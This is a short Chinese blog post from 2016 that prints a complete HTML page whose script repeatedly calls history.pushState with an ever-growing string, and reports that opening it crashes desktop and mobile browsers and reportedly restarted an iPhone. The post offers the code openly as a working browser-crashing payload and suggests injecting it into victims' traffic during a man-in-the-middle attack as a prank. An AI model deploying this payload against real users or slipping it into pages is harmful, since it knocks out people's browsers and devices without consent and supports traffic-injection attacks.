这十二行代码让浏览器爆炸

1,316次阅读
没有评论

共计 426 个字符,预计需要花费 2 分钟才能阅读完成。

这十二行代码让浏览器爆炸

完整 HTML 代码如下

<html><body><script>var total=””;for (var i=0;i<1000000;i++){total= total+i.toString(); history.pushState(0,0,total);}</script></body></html>

接来下会发生什么?
点开以后,我的状态是这样的:

这十二行代码让浏览器爆炸

如果你是 PC 端用户,点开链接以后,电脑 CPU 内存极有可能一路狂飙直至浏览器崩溃卡死!
如果你是移动端(安卓、iPhone)用户,点开链接以后你的浏览器会闪退!在微博、微信客户端点开链接同样会闪退。至于在推文中提到的让 iPhone 重启,这一现象倒是没有出现。22:49 修正:iPhone 用 Safari 打开之后链接之后,手机注销重启了!…
思考
这是 Bug 还是 0day? 为什么会有这一现象?如何实现的?
有哪些比较有意思的利用姿势?(我先来个: 当在执行 MITM 中间人攻击的时候,可以注入这一段 js,来个恶搞整蛊。然后都懂的…)

正文完
 0
ddn
版权声明:本站原创文章,由 ddn 2016-03-11发表,共计426字。
转载说明:除特殊说明外本站文章皆由CC-4.0协议发布,转载请注明出处。
评论(没有评论)